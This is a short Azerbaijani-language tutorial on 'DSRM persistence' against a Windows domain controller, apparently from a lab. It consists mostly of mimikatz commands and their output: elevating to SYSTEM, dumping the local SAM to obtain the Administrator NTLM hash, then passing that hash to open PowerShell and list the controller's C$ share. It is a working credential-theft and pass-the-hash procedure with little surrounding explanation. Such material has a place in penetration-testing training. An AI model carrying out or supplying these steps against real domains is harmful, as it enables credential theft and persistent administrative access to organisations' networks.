DSRM Persistence

DSRM — Bir DC qaldırdığımızda bizdən DSRM şifrəsi tələb edir.

Bu parol, sonradan bir şey səhv olarsa, administratora verilənlər bazası üçün arxa qapı verir.

Bunun üçün mimikatz’dan istifadə edəcəm.

mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
Domain : DCAX1
SysKey : a877f33ac1836583a3b6376c44f48929
Local SID : S-1–5–21–3064160234–1884367780–1673273373
SAMKey : e3d5b234555c0b7cddd3e073fd265f42
RID : 000001f4 (500)
User : Administrator
 Hash NTLM: 1970ea3ee1a54583d3329e86e9b38956
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount

Aldığımız hash’dan istifadə edək.

mimikatz # sekurlsa::pth /domain:DCAX1 /user:Administrator /ntlm:1970ea3ee1a54583d3329e86e9b38956 /run:powershell.exe
user : Administrator
domain : DCAX1
program : powershell.exe
impers. : no
NTLM : 1970ea3ee1a54583d3329e86e9b38956
 | PID 3028
 | TID 3352
 | LSA Process is now R/W
 | LUID 0 ; 3010853 (00000000:002df125)
 \_ msv1_0 — data copy @ 000001421262A670 : OK !
 \_ kerberos -
PS C:\Windows\system32> ls \\DCAX1\C$
Directory: \\DCAX1\C$
Mode LastWriteTime Length Name
 — — — — — — — — — — — — — — 
d — — — 9/15/2018 12:19 AM PerfLogs
d-r — — 10/18/2021 12:50 PM Program Files
d — — — 10/18/2021 12:50 PM Program Files (x86)
d-r — — 10/18/2021 12:50 PM Users
d — — — 10/18/2021 1:04 PM Windows

referans:

Sneaky Active Directory Persistence #13: DSRM Persistence v2

https://www.hackingarticles.in/domain-persistence-dsrm/